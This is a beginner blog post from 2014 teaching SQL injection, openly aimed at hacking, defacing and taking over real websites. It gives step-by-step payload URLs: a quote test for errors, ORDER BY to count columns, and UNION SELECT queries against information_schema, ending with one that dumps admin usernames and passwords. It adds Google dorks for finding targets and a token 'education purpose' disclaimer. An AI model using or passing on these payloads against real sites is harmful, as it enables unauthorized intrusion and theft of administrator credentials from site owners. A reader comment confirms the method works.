» » » Sql Injection for Beginner Easy Way

A+ A-

Sql Injection for Beginner Easy Way 

 


Today I'll teach you about Sql injection 
==> Sql Injection is an attack that used to hack a site. 
 If you learn Sql injection than you can hack site and deface ,root etc In sql injection you inject a site and get information about admin and login into the site. And you do what ever you want ;)

Step 1

Find a sites like www.example.com/index.php?id=123 In 123 may also any other numbers or alphabets
 "you can use google dorks to find such sites"

how to use google dorks click me

Step 2

When you find such site than add single quote (') in the end without brackets www.example.com/index.php?id=123'
When site give any error like or other so the site is vulnerable
if not than try other site
1) Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/example/index.php on line 85
 2)You have an error in your SQL syntax near '\' at line 1

Step 3

So site is vulnerable now we check total numbers of columns for checking numbers of columns we used "order by --" without quotes  

Example :
 
 www.example.com/index.php?id=123 order by 10--
 if site not give any error than we increase the 10 to 11,12,13 upto when site give error
 e.g www.example.com/index.php?id=123 order by 11--
 if site give any error than we decrease the 10 to 9,8,7 upto when site give error
e.g www.example.com/index.php?id=123 order by 9--
Lets suppose if site not give error in 5
e.g www.example.com/index.php?id=123 order by 5--
And give error in
 e.g www.example.com/index.php?id=123 order by 6--
Its mean there is 5 columns

Step 4

Now check which column is vulnerable using "union select" and looked site there is Null (-) before 123 always put
e.g www.example.com/index.php?id=-123 union select 1,2,3,4,5--
 when you executed that code than you see on the page of there site there may any number 2 3 or other but not greater than five in this case. when you see 2 3 so 2 and 3 columns are vulnerable

Step 5

In this step we get all table name
let I select 3 you can also select on yours own choice but must vulnerable
e.g www.example.com/index.php?id=-123 union select 1,2,group_concat(table_name),4,5 from information_schema.table where table_schema=database()--

Step 6

The above code shows all the table that present in the database so here you select admin like table
e.g tbl_admin,admin,administrator etc may other name but must like admin because now we extract information about admin of the site Now we select for example admin and get columns.
But wait now we can't put admin in our code directly
So click below link and convert admin into ASCII value and add commans (,) in b/w all value and paste in CHAR() in brackets

Click me for ASCII value
In site admin or other table name always write with space such as admin=a d m i n

e.g www.example.com/index.php?id=-123 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--

This will show all columns of admin columns are may password pass pwd user ad_user etc or other

Step 6

let they are two columns user and password
In this columns user contain the user name of site and password contain the password of the site admin Follow me to getting information from these columns

e.g www.example.com/index.php?id=-123 union select 1,2,group_concat(user,0x3a,password),4,5 from admin--

You are successfully hack the site enter information in site admin panel and login

only for eduction purpose
4/24/2014
,

Post a Comment Blogger

  1. UnknownAugust 27, 2014

    This comment has been removed by the author.

    ReplyDelete
  2. UnknownAugust 27, 2014

    Very good tutorial I search all pages but not find complete and working tutorial . This one work good one cheer

    ReplyDelete

Subscribe to: Post Comments (Atom)
 
Top